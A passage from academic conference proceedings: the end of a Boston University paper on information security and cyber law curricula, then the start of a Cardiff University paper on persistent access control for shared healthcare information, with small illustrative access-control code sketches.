technology annually as they do on offices, warehouses, and factories combined, and these<br />

expenditures tend to increase. According to Cavusoglu et al. (2004) firms that experienced internet<br />


security breaches lose an average of 2.1% of their market value within two days, and subsequent<br />

studies confirmed the sensitivity of financial performance to security breaches.<br />

The threat of cyber espionage and cyber war is no longer restricted to expert forums but has<br />

become part of the public discussion. The increased number and sophistication of cyber-attacks<br />

clearly indicate that these attacks originate from professionally run business and government<br />

organizations. Estimates of the degree of the threat vary: Clarke (2010) posits that cyber<br />

armies are being set up in Russia, China, Israel, North Korea and Iran, while others believe the goal is<br />

espionage, not cyber war. However, no one disputes the large negative impact an information security<br />

breach can cause to the economy, government, or the individual.<br />

These developments clearly indicate that cyber law, business continuity and risk management<br />

provide an indispensable context for framing information security problems and are an integral part of<br />

finding effective solutions. A collaborative effort between the BU MET Computer Science and<br />

Administrative Sciences departments is currently under way to develop a new course in cyber law<br />

and to coordinate the curriculum of the information security concentrations in the MS programs in<br />

CS, CIS, and TC with an existing graduate certificate and specialization in Business Continuity,<br />

Security and Risk Management (Boston University 2010b).<br />

4.1 Law and regulation of information security<br />

As technology evolves, so must the law. The alleged obsolescence of legal rules governing computers and the<br />

Internet, among other technologically advanced fields, is well recognized in legal scholarship (Moses<br />

2007; Downing 2005). Because the resolution of legal problems is typically left to the chosen dispute<br />

resolution bodies, it is most important to identify in advance the types of legal problems that frequently<br />

follow technological change (Moses 2007; Lessig 1995). Some of the more important questions<br />

arising in relation to information security include:<br />

Defining the technological advancements needed to secure greater protections to the citizens and<br />

communities from cyber-attacks;<br />

Determining who can best regulate the Internet environment and control activity in cyberspace in<br />

a sovereign world;<br />

Constructing with law enforcement and the intelligence communities, an effective means of<br />

sharing actionable information with the private sector (Chander 2002);<br />

Establishing an ethics and conflict policy governing cyber activity and information security to<br />

address cultural change; and<br />

Understanding the ways in which the rise of online interaction alters the balance of power among<br />

individuals, corporations, and government, and how our choice of legal regime should be<br />

influenced by these changes (Chander 2002).<br />

We approach the development of the new information security law course by framing a course<br />

methodology and structuring the topics around the areas of the global regulatory environment,<br />

computer crime regulations in the US, jurisprudence over cyber space, culture and information<br />

security, cyber forensics and internet evidence, and international responsibility.<br />

Framing an Information Security Law Curriculum Methodology.<br />

Significantly, the global economy has expanded our vulnerability to manipulation of our software and<br />

hardware through a new phenomenon known as "the global supply chain", which increases the number<br />

of actors and the complexity of understanding the legal environment from both a domestic and global<br />

perspective. Technology today passes through many hands, including design, manufacture,<br />

distribution, transportation, wholesale, retail, installation, repair and firmware updates. To<br />

prevent these vulnerabilities we must focus on better system design, supply chain management,<br />

information security practices, public-private partnerships, law enforcement, intelligence and, most<br />

importantly, the education of users, employees and management.<br />

The primary pedagogical approach to teaching information security law at Boston University is<br />

through the Socratic method. Diverse Socratic methodologies are used to develop critical thinking<br />

skills including inquiry and debate, examination of complex real-life cybersecurity problems and<br />

ethical concerns, and conflict and contractual analysis. The case studies are derived primarily from<br />


court opinions, both domestic and foreign, and are used to provoke discussion, develop problem-solving<br />

skills, introduce the importance of teamwork and assist in attitudinal development. The goal is<br />

to extract and apply important principles of law as well as practical knowledge needed to prevent,<br />

track and enforce cybersecurity laws across jurisdictions. A critical component of the course is a<br />

research project in which students examine emerging topics; it draws not only on class<br />

discussions but also requires them to develop a proposal that advances innovation and<br />

improvement in our current technological and legal structures to combat breaches of<br />

cybersecurity.<br />

The curriculum allows students to progress from a basic understanding of the complex legal system<br />

governing cybersecurity to an overview of the methodologies, technological forensics and<br />

enforcement tools that governments need to fight cybersecurity violations both domestically and<br />

globally. The module includes analyzing legal authorities and boundaries in engaging adversarial<br />

cyber activitities, examining cybersecurity forensics and issues in global prosecution and<br />

enforcement, understanding the advantages and limitations of private versus public regulation in the<br />

cybersecurity field, identifying ethical, political and cultural concerns in the legal systems of<br />

various countries, and developing recommendations for the improvement and harmonization of global<br />

cybersecurity legal systems. A few examples of the key topics incorporated into the module include:<br />

the ability of law enforcement to access stored communications controlled by a third party such as a<br />

service provider or an employer; whether an interception can include acquisition of stored<br />

communications; the definition of electronic storage; the use of surveillance in national security<br />

investigations; the application of the federal Computer Fraud and Abuse Act (CFAA) extraterritorially;<br />

the collection of data from online transactions; the admissibility of electronic evidence; expedited<br />

preservation of computer data; and cross border searches and seizures.<br />

The above topics are of immediate significance for all industries, government and academia, as internet<br />

technologies have become an operational standard in our professional and private life. Knowledge of<br />

the essentials of information security law is an important requirement for all students today to be<br />

effective and successful in their chosen professions. Teaching information security law is about<br />

awareness, prevention and understanding the risks inherent in cyber attacks and cyberterrorism, as<br />

illustrated recently when U.S. military organizations denied access to websites carrying<br />

classified documents released by WikiLeaks and leading news organizations. Cyberspace is regulated<br />

through a complex network involving various modalities of constraint that include the legal and<br />

regulatory process, societal norms, markets such as price structures, and finally through the<br />

architecture of cyberspace, or its code (Lessig 1999; Lessig 1995; Bellia et al., 2007).<br />

The role of private entities in cyberspace as a source of regulatory control continues to create<br />

controversy. For example, domain names are controlled by a privately owned entity, the Internet<br />

Corporation for Assigned Names and Numbers (ICANN), which has been making policy for the past ten<br />

years in cooperation with the U.S. Department of Commerce (DoC) (Froomkin 2000). Important<br />

questions arise concerning government oversight and whether any constitutional norms might be<br />

applied to check the activities of these private entities, or whether oversight mechanisms could be<br />

adopted by legislatures (Bellia et al., 2007).<br />

U.S. Government surveillance under the Wiretap Act, the Electronic Communications Privacy Act<br />

and the Foreign Intelligence Surveillance Act (FISA) is a critical topic for information security,<br />

and the case law provides an excellent basis for discussing when particular conduct<br />

constitutes a violation of national security. Some scholars believe that all current contracts should<br />

require defense contractors to protect their IT infrastructure and to allow DOD assessments of<br />

compliance in this area. Others have suggested that Congress should enact a national defense-oriented<br />

statute that mirrors the Department of Homeland Security (DHS) statutes related to our<br />

domestic security (Brown 2009).<br />

In the leading case of Ashcroft v. ACLU, Justice Thomas concluded that website operators should be<br />

responsible for standards of conduct that exist wherever the site is accessible (Ashcroft v. ACLU<br />

2002). This is a significant decision considering that most websites have servers in many locations<br />

around the world.<br />

International Responsibility.<br />


Beyond understanding U.S. information security law, our students must recognize that, to the extent that cyber<br />

terrorists commit cross-border attacks, international law will be at the forefront of responding to these<br />

attacks (Lentz 2010). An international law duty that requires all states to prevent and respond to cyber<br />

terrorist acts has been created by the passage of the United Nations Security Council Resolution<br />

1373, which requires States among other actors to take necessary steps to prevent the commission of<br />

terrorist acts, deny safe havens to those who finance, plan, support or commit terrorist acts, ensure<br />

that any person who participates in the financing, planning, or perpetration of terrorist acts is brought<br />

to justice, and afford one another the greatest measure of assistance in connection with criminal<br />

investigation or proceedings.<br />

4.2 Business continuity, security, and risk management<br />

Business continuity traditionally focuses on the organizational processes that evaluate risks and<br />

develop plans at the strategic, tactical and operational levels to ensure the uninterrupted continuation<br />

of business processes. It is a broad management domain distinct from information security but one that<br />

has substantive relationships with issues of information classification and preservation as well as the<br />

sources of system vulnerabilities and threats. The specialization in Business Continuity, Security and<br />

Risk Management includes three required courses and a related elective (Boston University, 2010b).<br />

The core curriculum builds an academically solid foundation through discussions of specific industry<br />

needs. The required courses proceed from an overview of central issues and assessment approaches<br />

to details of risk planning and strategy and the development of emergency response plans as follows:<br />

Introduction to Business Continuity, Security, and Risk Management (AD610) is an overview<br />

course that examines management issues involved in assessing the security and risk<br />

environments in both the private and public sectors in order to assure continuous system-wide<br />

operations. The course studies the elements of risk assessment and operational continuity and<br />

exposes the role of the firm in crisis response and management as well as the terms, systems,<br />

and interactions necessary to assure continuous operations.<br />

System-Wide Risk Planning, Strategy, and Compliance (AD613) explores issues relating to<br />

corporate and organizational security and risk from both the perspective of systems designed to<br />

protect against disasters and aspects of emergency preparedness should systems fail. The<br />

course discusses proactive risk assessment, designing and implementing a global assurance<br />

plan, including control measures to assess the plan’s degree of success. The course also<br />

provides explanations of legal/regulatory, auditing, and industry-specific requirements related to<br />

compliance, control, and reporting issues in business risk management. The role of establishing<br />

and maintaining standards by local, national, and international agencies is discussed, as is the<br />

importance of these agencies in certifying operations.<br />

Incident Response and Disaster Recovery (AD614) builds on the concepts introduced in the<br />

previous two courses and applies them in more detail mainly to the corporate-private sector<br />

environment. The focus is on organization and processes necessary to effectively respond to and<br />

manage incidents, including the transition from emergency response and incident management to<br />

business recovery. Disaster recovery is discussed with an emphasis on technology recovery.<br />

The elective course gives students flexibility to pursue their individual interests in one of three areas:<br />

emergency management, project risk and cost management, and IT security policies and procedures,<br />

through the following courses:<br />

COO-Public Emergency Management (AD612) examines emergency management from national,<br />

state, local, and family perspectives of prevention, preparedness, response, and recovery. The<br />

course encompasses knowledge of the specific agencies, organizations, and individual behaviors<br />

in emergency management as well as the interlinking partnerships between these groups. Areas<br />

of discussion include: responsibilities at federal, state, community and individual levels; guidelines<br />

and procedures for operations and compliance such as the National Response Plan; Incident<br />

Command Systems (ICS); plan development, command, and control; communication; partnership<br />

development and maintenance; and leadership.<br />

Project Risk and Cost Management (AD644) presents approaches to managing the components<br />

of a project to assure it can be completed through both general and severe business disruptions<br />

on local, national, and international levels. Important aspects include cost management, early cost<br />

estimation, detailed cost estimation, and cost control using the earned value method.<br />

IT Security Policies and Procedures (CS684), which was discussed in section 3.1.<br />


5. Pedagogy, educational technologies and flexible delivery formats<br />

The maturing of the field and the great diversity of student backgrounds naturally led to the need for<br />

more imaginative and more participatory pedagogy. We were especially concerned with teaching our<br />

students how to relate concepts from different areas and apply them to real-world problems. To<br />

achieve this we developed a series of virtual laboratories that provided an environment for applying<br />

theoretical concepts, testing different approaches, and assuming alternative roles in various<br />

scenarios (Zlateva et al., 2008; Hylkema et al., 2010). The student reflections indicate that the new technologies<br />

enhance understanding and further communication and team building.<br />

Finally, we also needed to address the problem of making our programs accessible through flexible<br />

delivery formats, with which we have considerable experience: first with a blend of<br />

in-class and online instruction in 2000 (Zlateva et al., 2001), and since 2003 a fully online MS in CIS program.<br />

The online version of the security concentration was introduced in 2005. There are significant<br />

differences in the preparation and the delivery of a face-to-face and an online course. One of the<br />

most important factors for successful teaching and learning online is the ability to create a meaningful<br />

and close student-teacher and student-student interaction. Towards this goal we introduced videoconferencing<br />

tools that were used for discussion and review sessions with the instructor, and also by<br />

student teams working on a project. The feedback from students and faculty is overwhelmingly<br />

positive and we are currently developing use cases that reflect the best practices for these<br />

technologies.<br />

6. Conclusions and future work<br />

Over the last eight years we have developed a comprehensive curriculum for security education. The core<br />

ensures an in-depth discussion of the security of operating systems, software, and networks, as well as<br />

security policies and procedures. This core is complemented by concentration electives in digital<br />

forensics, biometrics, advanced cryptography, and security modules in high-level courses such as<br />

web technologies, enterprise computing, data mining, and health informatics. The information security<br />

programs are linked to the programs of business continuity that provide much needed management<br />

context. From a methodological point of view great care is taken to relate abstract theory to practical<br />

skills and team work by using virtual laboratories and video-collaboration tools. Overall the curriculum<br />

introduces analytical dialogue, creative concepts and critical pedagogical methodologies to advance<br />

student learning.<br />

References<br />

Ashcroft v. ACLU 542 U.S. 656 (2004).<br />

Boston University (2010a) Information Security Programs (http://www.bu.edu/csmet/academic-programs/ ) and<br />

Course Descriptions (http://www.bu.edu/csmet/academic-programs/courses/)<br />

Boston University (2010b) Business Continuity, Security and Risk Management<br />

http://www.bu.edu/online/online_programs/graduate_degree/master_management/emergency_management/courses.shtml<br />

Bellia, P.L., Berman, P.S. & Post, D.G. (2007). Cyberlaw: Problems of Policy and Jurisprudence in the<br />

Information Age, 4-10, St. Paul, MN: Thompson/West.<br />

Brown, T.A. (Lt. Col.) (2009). Sovereignty in Cyberspace: Legal Propriety of Protecting Defense Industrial Base<br />

Information Infrastructure, 64 A.F.L. Rev. 21, 256-257.<br />

Cavusoglu, H., Mishra, B. and Raghunathan, S. (2004). "The effect of Internet security breach announcements on<br />

market value: capital market reactions for breached firms and Internet security developers," International<br />

Journal of Electronic Commerce, Vol. 9, Number 1, pp. 69-104.<br />

Chabinsky, S. R. (2010). Cybersecurity Strategy: A Primer for Policy Makers and Those on the Front Line, 4 J.<br />

Nat'l Security L. & Pol'y 27, 38.<br />

Chander, A. (2002). Whose Republic? 69 U. Chi. L. Rev. 1479.<br />

Clarke, R.A. (2010). Cyber War, New York: Harper Collins.<br />

Cohen, A. (2010). Cyberterrorism: Are we Legally Ready? 9 J. Int'l bus. & L. 1, 40.<br />

Downing, R.W. (2005). Shoring up the Weakest Link: What Lawmakers Around the World Need to Consider in<br />

Developing Comprehensive Laws to Combat Cybercrime, 43 Colum. J. Transnat’l L. 705, 716-19.<br />

Hylkema, M., Zlateva, T., Burstein, L. and Scheffler, P (2010). Virtual Laboratories for Learning Real World<br />

Security - Operating Systems. Proc. 14th Colloquium for Information Systems Security Education,<br />

Baltimore, MD June 7 – 9.<br />

Kerr, O.S. (2003). Cybercrime's Scope: Interpreting 'Access' and 'Authorization' in Computer Misuse Statutes, 78<br />

NYU Law Review No. 5, 1596, 1621 (citing various state and federal statutes defining "access").<br />

Lentz, C.I. (2010). A State's Duty to Prevent and Respond to Cyberterrorist Acts, 10 Chi. J. Int'l L. 799, 822-823.<br />


Lessig, L. (1995). The Path of Cyberlaw, 104 Yale L.J. 1743, 1743-45.<br />

Lessig, L. (1999). The Law of the Horse: What Cyberlaw Might Teach, 113 Harv. L. Rev. 501, 509.<br />

Moses, L.B. (2007). Recurring Dilemmas: The Law’s Race to Keep Up With Technological Change, University of<br />

Illinois Journal of Law, Technology & Policy, The Board of Trustees of the University of Illinois, 7 U. Ill. J.L.<br />

Tech. & Policy 239, 241-243.<br />

Zlateva, T., Burstein, L., Temkin, A., MacNeil, A. and Chitkushev, L. (2008): Virtual Laboratories for Learning<br />

Real World Security. Proceedings of the Colloquium for Information Systems Security Education, Society for<br />

Advancing Information Assurance and Infrastructure Protection, Dallas, Texas, June 2-4, 2008.<br />

Zlateva, S., Kanabar, V., Temkin, A., Chitkushev, L. and Kalathur, S. (2003): Integrated Curricula for Computer<br />

and Network Security Education, Proceedings of the Colloquium for Information Systems Security<br />

Education, Society for Advancing Information Assurance and Infrastructure Protection, Washington, D.C.,<br />

June 3-5, 2003.<br />

Zlateva, T. and Burstein, J. (2001): "A Web-Based Graduate Certificate for IT Professionals - Design Choices and First<br />

Evaluation Results". Proceedings of the 2001 Annual Conference of the American Society for Engineering<br />

Education (ASEE), June 24-27, Albuquerque, New Mexico. http://soa.asee.org/paper/conference/paperview.cfm?id=16617<br />

PhD Research Papers<br />


Towards Persistent Control over Shared Information in a<br />

Collaborative Environment<br />

Shada Alsalamah, Alex Gray and Jeremy Hilton<br />

Cardiff University, UK<br />

S.A.Salamah@cs.cardiff.ac.uk<br />

W.A.Gray@cs.cardiff.ac.uk<br />

Jeremy.hilton@cs.cardiff.ac.uk<br />

Abstract: In a complex collaborative environment, such as healthcare, where Multi-Disciplinary care Team<br />

(MDT) members and information come from independent organisational domains, there is a need for information-sharing<br />

across the organisations’ information systems in order to achieve the overall goal of collaboration.<br />

The inability to provide a secure communication method giving local/global protection affects inter-professional<br />

communication and hinders sharing among MDT members. This research aims to facilitate a secure<br />

collaborative environment enabling persistent control over shared information across boundaries of the<br />

organisations that own the data. This paper is based on the early stages of the research and its results will feed<br />

into the following stages. It looks at the structure of a healthcare system to understand the types of inter-professional<br />

communication and information exchange that occur in practice. Additionally it presents an initial assessment<br />

identifying the Information Security (IS) needs and challenges faced in providing persistent control in a shared<br />

collaborative environment by using conceptual modelling of a selected medical scenario (breast cancer in<br />

Wales). The results show that a considerable number of professionals are involved in a patient’s treatment. Each<br />

plays a well-defined role, but often uses different Healthcare Information Systems (HIS) to store sensitive and<br />

confidential patient medical information. These HIS cannot provide secure multi-organisational information-sharing<br />

to support collaboration among the MDT members. This causes inter-professional communication issues<br />

among team members that inhibit decision-making using the information. The findings from this study show how<br />

to improve the information support that HIS-stored information provides for MDT members. The resulting IS functions,<br />

which facilitate establishing secure collaborative environments guaranteeing persistent control over<br />

shared information, will also be described.<br />

Keywords: information security, information system, Information sharing, multi-disciplinary team, persistent<br />

control, secure collaborative environment<br />

1. Introduction<br />

Current innovation in Information and Communication Technology (ICT) has encouraged collaboration<br />

within and among different fields, including healthcare. This has led to novel inventions and<br />

solutions to large-scale scientific problems. Such collaboration often demands extensive sharing of<br />

different resources among collaborating organisations in order to achieve an overall goal (Park and<br />

Sandhu, 2002; Wasson and Humphrey, 2003; Yau and Chen, 2008). Such collaboration may involve<br />

information in distributed resources being used and shared by users from geographically and<br />

administratively distributed physical organisations that own the resources. Across sites, these<br />

collaborations form Virtual Organisations (VOs) (Wasson and Humphrey, 2003; Yau and Chen, 2008).<br />

Therefore, a key characteristic of a VO is that users and information may come from different<br />

organisations, and thus various administrative domains (Thompson et al., 2003) with each applying<br />

local Information Security (IS) rules to protect its own information. As a result, when these<br />

organisations come together in a VO, they demand a Secure Collaborative Environment (SCE) for<br />

sharing resources, mainly information and data. However, there are three possible levels of protection<br />

when user(a) in domain(a) needs to share information with user(b) in domain(b) outside its secured<br />

administrative domain(a).<br />

Level 1 is local to domain(a) - user(a) loses control over the information once it is shared as the<br />

protection level applied inside domain(a) using IS rules(a) is not guaranteed outside this domain<br />

(once it has passed to domain(b) where IS rules(a) are not applied).<br />

Level 2 allows user(a) to have static control over the shared information when its protection is<br />

assured by user(b) using IS rules(b) when inside domain(b). (Here user(a) passes control to<br />

user(b), and although the information will still be protected, the rules applied change once the<br />

information is received, since user(a) has no control over domain(b)’s protection authority. Thus if<br />

the protection level of original information changes in domain(a), there is no guarantee that<br />

user(b) will also change it on the shared version of this information in domain(b). Additionally, if<br />

user(b) changes the protection on the shared version, user(a) cannot retain control).<br />


Level 3 allows dynamic control. It enables persistent control over information anywhere outside domain(a), including domain(b), by communicating rules(a) along with the shared information. Persistent control, in this context, also enables synchronisation of any change made to the protection level of the original information in domain(a) with the shared version of the information in domain(b). This guarantees user(a) full control at all times by sustaining the original information protection level outside its domain and making it remotely editable. Only this final protection level creates an SCE in a VO; a collaborative environment with multiple independent domains is therefore referred to as an SCE only when each domain has persistent control over its shared information.<br />

Based on this, we can differentiate between Levels 2 and 3: dynamic control creates an SCE, whereas static control does not. This is because the latter leaves the information outside both users’ control from the point it leaves domain(a) until it is received at domain(b), although it is otherwise secured.<br />
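The Level 3 (dynamic control) model can be sketched in code. The sketch below is purely illustrative: it assumes a hypothetical `PolicyAuthority` service standing in for domain(a)'s rule store, and a `SharedInfo` wrapper that carries a reference back to that authority. Because every read of the shared copy consults the current rules(a), a change made by user(a) takes effect in domain(b) immediately.

```python
from dataclasses import dataclass


class PolicyAuthority:
    """Hypothetical stand-in for domain(a)'s rule store, IS rules(a)."""

    def __init__(self):
        self._allowed = {}                      # info_id -> set of user ids

    def set_rules(self, info_id, users):
        self._allowed[info_id] = set(users)     # user(a) edits rules remotely

    def is_allowed(self, info_id, user):
        return user in self._allowed.get(info_id, set())


@dataclass
class SharedInfo:
    """Information shared into domain(b) with rules(a) attached (Level 3)."""
    info_id: str
    payload: str
    authority: PolicyAuthority                  # reference back to domain(a)

    def read(self, user):
        # Every access re-checks the *current* rules in domain(a), which is
        # what gives user(a) persistent control over the shared copy.
        if not self.authority.is_allowed(self.info_id, user):
            raise PermissionError(f"{user} may not read {self.info_id}")
        return self.payload


authority = PolicyAuthority()
authority.set_rules("record-1", {"user_b"})
shared = SharedInfo("record-1", "sensitive medical data", authority)

assert shared.read("user_b") == "sensitive medical data"
authority.set_rules("record-1", set())          # user(a) revokes access
try:
    shared.read("user_b")
except PermissionError:
    print("access revoked")
```

Under static (Level 2) control, by contrast, the rules would be copied into domain(b) at sharing time and later changes in domain(a) would not propagate.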

In fact, static and dynamic levels of information protection could suit different scenarios based on the<br />

information protection level required. This paper explores the need for SCEs in VOs and the<br />

challenges in implementing this environment by investigating a representative example of a VO,<br />

namely the healthcare scenario. This paper is based on a case-study scenario carried out in this<br />

naturally complex environment where healthcare professionals from different organisations critically<br />

need to collaborate and have control over exchanged medical information when treating a patient with<br />

breast cancer in Wales, UK. The remainder of the paper is divided into five main sections, covering the<br />

problem statement, method for understanding the problem, results, a discussion of the results and<br />

conclusion.<br />

2. Problem statement<br />

In this scenario, the patient treatment delivery model is shifting from a disease-centric approach<br />

towards one that is patient-centric (Allam, 2006; Al-Salamah et al., 2009), and considers the patient’s<br />

medical condition as a whole rather than by managing patients as having separate diagnosed<br />

diseases, each treated by different professionals (Department of Health, 1997; Pirnejad, 2008; Al-Salamah et al., 2009). In a patient-centric approach, the patient is the central focus and is treated by a<br />

Multi-Disciplinary care Team (MDT) (Allam, 2006; Al-Salamah et al., 2009). This team consists of<br />

different healthcare professionals coming from different healthcare organisations to form a VO for<br />

patient treatment. This MDT, and hence the VO, evolves over time in response to the patient’s<br />

changing medical condition. In addition, in order to organise the MDT work and assist the delivery of<br />

patient treatment, a visual and structured care plan, called an Integrated Care Pathway (ICP), is<br />

followed. This plan reflects an ideal, evidence-based patient treatment journey for the condition<br />

(Zander, 2002; Al-Salamah et al., 2009; Map of Medicine, 2010e). In the UK, ICPs are based on<br />

having regular MDT meetings to discuss the patient’s case and provide recommendations for the<br />

treatment management plan. This new approach is increasing the need for sharing medical<br />

information among MDT members as they work together on treating the patient. Consequently, this<br />

will possibly require the information to leave the systems where each member stores patient<br />

information (Smith and Eloff, 1999; Thompson et al., 2003; Beale, 2004; Pirnejad, 2008). The<br />

distributed nature of this collaboration demands an effective SCE that facilitates secure inter-professional communication among members, to exchange often-sensitive information.<br />

HISs currently used in patient treatment are hindering inter-professional communication among MDT<br />

members in the health environment. The literature shows that healthcare is suffering from poor inter-professional communication (Pirnejad, 2008) and this is a key factor contributing to medical errors<br />

(Mohyuddin et al., 2008; Al-Salamah et al., 2009). Indeed, research estimates an annual figure of<br />

850,000 medical errors occurring in NHS hospitals (Department of Health, 2000). These can lead to<br />

death, life-threatening illness, disability, admission to hospital, or prolongation of a hospital stay, as well as complications in treatment which, in most cases, might have been avoided if the patient had received ordinary standards of care (Department of Health, 2000; Aylin et al.,<br />

2004). Furthermore, the NHS spends around £400 million annually in settlement of clinical negligence<br />

claims, and has a potential liability of around £2.4 billion for existing and expected claims (Department<br />

of Health, 2000). However, a prime reason behind communication issues and medical errors in the healthcare environment is the limitations of the HISs and ICT used in patient treatment (Smith and Eloff,<br />

1999; Commission for Health Improvement and Audit Commission, 2001; Anderson, 2008;<br />

Mohyuddin et al., 2008; Pirnejad, 2008; Al-Salamah et al., 2009; Skilton et al., 2009). These cause<br />

problems in data processing and representation, the amount of information they are capable of<br />


providing (Mohyuddin et al., 2008), and in communication at departmental, organisational, and even<br />

national levels (Al-Salamah et al., 2009). This is because some of these HISs were designed over 50<br />

years ago (Department of Health, 1997) and thus were tailored to meet the requirements of the<br />

disease-centric approach prevailing at that time (Al-Salamah et al., 2009; Skilton et al., 2009).<br />

Although legacy systems may be capable of providing local and static protection, in the new patient-focused approach they hinder communication and information-sharing since protection is not<br />

guaranteed outside secured domains. As a result, information is only accessible within secured<br />

domains where such HISs exist (Lillian, 2009) and the only method of sharing is verbally or by printing<br />

on paper for posting. In addition, despite the fact that ICT is used in some healthcare organisations to<br />

improve communication, in practice, the results did not meet expectations, because either the HIS<br />

failed to be implemented in the healthcare environment or could not achieve implementation<br />

objectives (Commission for Health Improvement and Audit Commission, 2001; Pirnejad, 2008).<br />

Finally, according to Anderson (2008: 3-11), although the security requirements of these systems vary<br />

in terms of the collection of authentication, transaction integrity and accountability, message secrecy,<br />

and covertness they use, many fail because system designers protect either the wrong information, or<br />

the right information but in the wrong way. See reported incidents and concerns in (Blackhurst, 2010;<br />

NursingTimes, 2010a; NursingTimes, 2010b; Sturcke and Campbell, 2010).<br />

Nevertheless, implementation of the new patient-centric approach demands an SCE. The HIS is not<br />

like any other information system because of the “patient” entity. It holds extensive information<br />

combining the patient’s biological details and social complexity (Beale, 2004). This information may<br />

contain personal (Office of Public Sector Information, 1998; Department of Health, 2003),<br />

embarrassing (Sturcke and Campbell, 2010), and critical medical information (National Institute for<br />

Healthcare and Clinical Excellence, 2002; Beale, 2004; Meystre, 2007). The nature of a customer or<br />

traveller’s information stored in a bank or airline system decays with age and normally once this<br />

information is published or exposed, protection is no longer required. Patient information, on the other<br />

hand, has a longevity characteristic (Beale, 2004) that will always render it highly sensitive (Smith and<br />

Eloff, 1999) and confidential (Department of Health, 2003); indeed, it is the type of information that will<br />

never expire even after the patient’s death. It is therefore critical to have constant protection with<br />

persistent control and the assurance that it will only be disclosed to the right person for permitted<br />

medical purposes (Department of Health, 2003). Since legacy HISs are not designed to achieve this,<br />

an SCE is essential to help members of MDTs share this information securely with persistent control.<br />

Most of the existing solutions attempt to protect information as long as it exists within the secured<br />

domain and when this information is shared across boundaries, it is no longer secured or controlled<br />

(Park and Sandhu, 2002; Burnap and Hilton, 2009; Nene and Swanson, 2009). Further examples are<br />

in (Chadwick, 2002; Alfieri, 2003). Furthermore, although several solutions are able to protect<br />

electronic information across domains such as Digital Rights Management and Usage Control (Park<br />

and Sandhu, 2002), they are either constrained by the number of uses and/or users (Nene and<br />

Swanson, 2009) or the control policy associated with the content cannot be modified by the<br />

information owner once disseminated (Thompson, et al., 2003). In fact, this is a vital issue that would<br />

prevent adapting to the dynamic nature of the VO environment, such as healthcare, where the need<br />

to protect the information is as important as the need for sharing it. For example, when members of<br />

the VO change their roles or one of the participating organisations goes out of existence, there will be<br />

a need to deny access to information previously shared (Burnap and Hilton, 2009). Therefore, these<br />

solutions are restricted and incapable of providing full protection with the flexibility of persistent<br />

control.<br />

However, enabling information-sharing across organisations with persistent control raises a number of<br />

IS issues and challenges that limit the effectiveness, dynamism, and potential of this collaborative<br />

working (Beale, 2004; Burnap and Hilton, 2009). Firstly, MDT members and information resources<br />

come from different organisations and administrative domains (Thompson et al., 2003). Although<br />

organisations adopt national good-practice guidelines and IS policies to protect in-house medical<br />

information, they adapt them to fit local needs and circumstances (Cancer Services Expert Group,<br />

2008). In other words, MDT members and the systems they use do not speak the same IS language<br />

either at the human or machine level. This makes interoperability difficult since there are no clear and<br />

precise IS policies and practice guidelines at a national level governing a VO-wide exchange of<br />

information. This may result in direct conflicts in terms of information access requirements between<br />

software applications of multiple vendors in use (Beale, 2004). Consequently, negotiating VO-wide<br />

agreements across organisations is often a lengthy and complex process (Thompson et al., 2003).<br />

Secondly, the collaboration demands extensive information-sharing among MDT members in order to<br />


assure the availability of relevant information in a continually changing scene. However, sharing<br />

sensitive information requires a focus on the person’s role in the treatment process, since different<br />

roles have different information requirements. This necessitates a careful balance between the<br />

availability of life-critical data and confidentiality of patient information so that it supports prompt<br />

reliable care without privacy violation. According to Beale (2004) and Anderson (2008: 3-11), these two requirements are in direct conflict, which makes this balance hard to achieve, even using current traditional computer security mechanisms. Thirdly, the human side of the collaborative environment<br />

increases the complexity. In each organisation, professionals and other employees involved with the<br />

management, use, or operation of the resources within the domain are normally mandated to attend<br />

annual organisation-wide IS training sessions to inform personnel of IS risks associated with their<br />

activities and their responsibilities in complying with organisation policies and procedures designed to<br />

reduce such risk, as well as to manage resources and protect information. However, the absence of<br />

a VO-wide IS awareness means MDT members are unaware of the overall required IS needs of all<br />

involved organisations, and their responsibility to ensure information received from different<br />

organisations is protected and that its use is fit for purpose in the treatment. Fourthly, relevant medical<br />

information should be available across organisations seamlessly (Yau and Chen, 2008). Finally, there<br />

are additional existing technical, economic, political, ethical and logistical information ownership<br />

issues and barriers that hinder sharing across organisations (Smith and Eloff, 1999; Mandl et al.,<br />

2001; Beale, 2004; Cross, 2006).<br />

This research aims to address some of these issues and challenges by defining and implementing an<br />

approach that would help provide an SCE with persistent control. This should provide seamless remote access to information that reflects the changing roles of MDT members as the treatment progresses along the ICP, and provides only relevant information to team members based on their current role in the treatment process. In addition, it should offer a common user-friendly set of IS rules to be used<br />

by MDT members from all involved organisations. These rules should be embedded in the information<br />

being shared in order to sustain the rules as defined by the information owner. Finally, having<br />

common IS rules will ease raising MDT members’ awareness of their responsibilities towards the<br />

protection of exchanged information. This will need to be developed in different research stages,<br />

starting with an understanding of the healthcare system and the information exchanges occurring in<br />

practice, to the investigation of the current information systems’ issues and MDT IS needs for the<br />

collaboration, and ending with a solution that would facilitate this secure sharing of information with<br />

persistent control.<br />
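The role-sensitive access just described can be illustrated with a minimal sketch. The role names and record types below are invented for the example; a real mapping would be derived from the common IS rules agreed across the VO, not hard-coded.

```python
# Hypothetical mapping from an MDT member's current role to the record
# types that role needs; these names are illustrative only.
ROLE_VIEW = {
    "gp":          {"clinical history", "referral form", "follow-up plan"},
    "radiologist": {"x-ray report", "ultrasound report", "mri report"},
    "pathologist": {"biopsy report", "histology report"},
}


def visible_records(role, records):
    """Return only the records relevant to the member's current role."""
    allowed = ROLE_VIEW.get(role, set())
    return [r for r in records if r["type"] in allowed]


patient_records = [
    {"type": "clinical history", "data": "..."},
    {"type": "mri report",       "data": "..."},
    {"type": "histology report", "data": "..."},
]

types = [r["type"] for r in visible_records("radiologist", patient_records)]
assert types == ["mri report"]   # the radiologist sees only imaging reports
```

Because the filter is applied at every access, a member whose role changes as the patient moves along the ICP automatically gains or loses visibility of the corresponding record types.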

3. Method<br />

We believe it is important to gain an understanding of the inter-professional communication and<br />

information exchange in practice through the study of a real-life scenario. The breast cancer scenario<br />

in Wales was selected as a healthcare system whose structure would be examined to understand:<br />

how MDT members communicate; how HISs are used by the MDT to achieve the overall treatment<br />

goal; how the information is generated and stored; and how it can be used to support collaboration. In<br />

addition, it will allow an initial assessment that will help identify the IS needs for the SCE with<br />

persistent control.<br />

Our reference scenario’s conceptual model is the ICP treatment journey for breast cancer in<br />

Wales. It is divided into six parts (Map of Medicine, 2010a; Map of Medicine, 2010b; Map of Medicine,<br />

2010c; Map of Medicine, 2010d; Map of Medicine, 2010g; Map of Medicine, 2010h), which are taken<br />

